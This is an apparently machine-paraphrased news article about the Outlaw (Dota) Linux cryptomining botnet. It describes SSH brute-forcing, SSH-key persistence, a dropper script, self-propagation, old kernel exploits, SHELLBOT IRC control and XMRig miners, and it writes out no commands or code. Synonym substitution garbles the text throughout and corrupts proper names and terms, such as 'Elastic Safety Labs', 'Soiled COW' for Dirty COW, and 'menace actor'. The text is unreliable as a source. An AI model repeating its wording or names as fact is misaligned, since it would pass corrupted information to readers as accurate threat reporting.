Cybersecurity researchers have make clear an “auto-propagating” cryptocurrency mining botnet referred to as Outlaw (aka Dota) that is recognized for concentrating on SSH servers with weak credentials.
“Outlaw is a Linux malware that depends on SSH brute-force assaults, cryptocurrency mining, and worm-like propagation to contaminate and preserve management over techniques,” Elastic Safety Labs stated in a brand new evaluation printed Tuesday.
Outlaw can be the identify given to the menace actors behind the malware. It is believed to be of Romanian origin. Different hacking teams dominating the cryptojacking panorama embrace 8220, Keksec (aka Kek Safety), Kinsing, and TeamTNT.
Lively since not less than late 2018, the hacking crew has brute-forced SSH servers, abusing the foothold to conduct reconnaissance and preserve persistence on the compromised hosts by including their very own SSH keys to the “authorized_keys” file.
The attackers are additionally recognized to include a multi-stage an infection course of that entails utilizing a dropper shell script (“tddwrt7s.sh”) to obtain an archive file (“dota3.tar.gz”), which is then unpacked to launch the miner whereas additionally taking steps to take away traces of previous compromises and kill each the competitors and their very own earlier miners.
A notable function of the malware is an preliminary entry element (aka BLITZ) that permits for self-propagation of the malware in a botnet-like vogue by scanning for weak techniques working an SSH service. The brute-force module is configured to fetch a goal record from an SSH command-and-control (C2) server to additional perpetuate the cycle.
Some iterations of the assaults have additionally resorted to exploiting Linux- and Unix-based working techniques prone to CVE-2016-8655 and CVE-2016-5195 (aka Soiled COW), in addition to assault techniques with weak Telnet credentials. Upon gaining preliminary entry, the malware deploys SHELLBOT for distant management through a C2 server utilizing an IRC channel.
SHELLBOT, for its half, allows the execution of arbitrary shell instructions, downloads and runs further payloads, launches DDoS assaults, steals credentials, and exfiltrates delicate info.
As a part of its mining course of, it determines the CPU of the contaminated system and allows hugepages for all CPU cores to extend reminiscence entry effectivity. The malware additionally makes use of a binary referred to as kswap01 to make sure persistent communications with the menace actor’s infrastructure.
“Outlaw stays lively regardless of utilizing fundamental methods like SSH brute-forcing, SSH key manipulation, and cron-based persistence,” Elastic stated. “The malware deploys modified XMRig miners, leverages IRC for C2, and contains publicly accessible scripts for persistence and protection evasion.”
